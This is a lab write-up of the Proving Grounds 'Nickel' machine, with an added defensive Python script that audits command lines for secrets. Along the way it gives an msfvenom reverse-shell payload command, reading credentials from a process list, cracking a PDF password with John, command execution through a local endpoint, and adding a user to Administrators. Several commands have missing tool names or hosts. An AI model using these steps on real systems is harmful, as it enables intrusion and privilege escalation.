Writeup for Nickel from Offensive Security Proving Grounds (PG)

Information Gathering

Service Enumeration -H -t full -H -t vulns

SMB (139)

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f python


On port 8089, we have a dashboard:
Each of the links bring us to By going to instead, we get a Not Found response for /list-current-deployments.
We get a different message, however, for /list-running-procs.
If we send a POST request instead, we indeed see a list of running processes!
In the command line of one of the processes, we get a user's credentials.
Plugging the -p parameter into CyberChef, we can see that it is a Base64-encoded password (NowiseSloopTheory139).
Using the credentials ariah:NowiseSloopTheory139, we can SSH into the server.
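The exposure above (a password passed as a Base64-encoded -p argument and readable by anything that can list processes) can be audited for from the defender's side. The following is an added example, not part of the original writeup: it flags command-line arguments that carry a secret, encoded or not, without echoing the secret. The flag list, function names and sample process lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
import shlex

# Assumed list of flags that carry a secret as the next argument; extend for your estate.
SECRET_FLAGS = {"-p", "-pw", "-pass", "--password"}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def decode_if_base64(value):
    """Return the decoded text if value is base64 of printable ASCII, else None."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("ascii", errors="ignore")
    return text if len(text) == len(raw) and text.isprintable() else None


def audit_command_line(cmdline):
    """Return [(flag, kind)] for secret-bearing arguments; the secret itself is never returned."""
    try:
        args = shlex.split(cmdline, posix=False)  # keeps Windows backslashes intact
    except ValueError:  # unbalanced quotes
        args = cmdline.split()
    findings = []
    for flag, value in zip(args, args[1:]):
        if flag.lower() in SECRET_FLAGS:
            kind = "base64" if decode_if_base64(value.strip('"')) else "plaintext"
            findings.append((flag, kind))
    return findings


def sample_process_list():
    """Constructed (name, command line) pairs; not output from the target machine."""
    encoded = base64.b64encode(b"Constructed-Example-1").decode()
    return [
        ("svchost.exe", r"C:\Windows\system32\svchost.exe -k netsvcs -p"),
        ("backup.exe", r'"C:\Tools\backup.exe" -u svc_backup -p ' + encoded),
        ("sync.exe", r"C:\Tools\sync.exe --password Summer2024!"),
    ]


def audit(processes):
    """Map process name -> findings, omitting processes with nothing to report."""
    hits = ((name, audit_command_line(cmd)) for name, cmd in processes)
    return {name: found for name, found in hits if found}
```

Base64 is an encoding, not protection, so both kinds of finding warrant rotating the credential and moving it out of the command line. The svchost.exe line shows a trailing -p switch with no value, which is not reported.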

Privilege Escalation

Using previously found credentials for ariah, we can access the FTP service and download a PDF file.
However, a password is required. The previously found password does not work.
Use to extract the hash.
perl john-bleeding-jumbo/run/ Infrastructure.pdf > Infrastructure-Hash.txt
Use John the Ripper to crack the hash.
john --wordlist=/usr/share/wordlists/rockyou.txt Infrastructure-Hash.txt
The password is ariah4168.
Here, we find a 'Temporary Command endpoint' at http://nickel/ that is only accessible through the remote machine.
Using PowerShell, we can send a GET request to the API endpoint.
$Resp = Invoke-WebRequest 'http://nickel/?whoami' -UseBasicParsing
This executes whoami, and we can see the output below.
We have RCE as SYSTEM. However, any outgoing traffic is blocked, so we cannot spawn a second reverse shell as SYSTEM. Let's do the next best thing - adding ourselves to the Administrators group.
localgroup Administrators ariah /add
If we check the Administrators group again (net localgroup Administrators), we can see that our user ariah was added.
Now, we can RDP into the machine and run the command prompt as Administrator.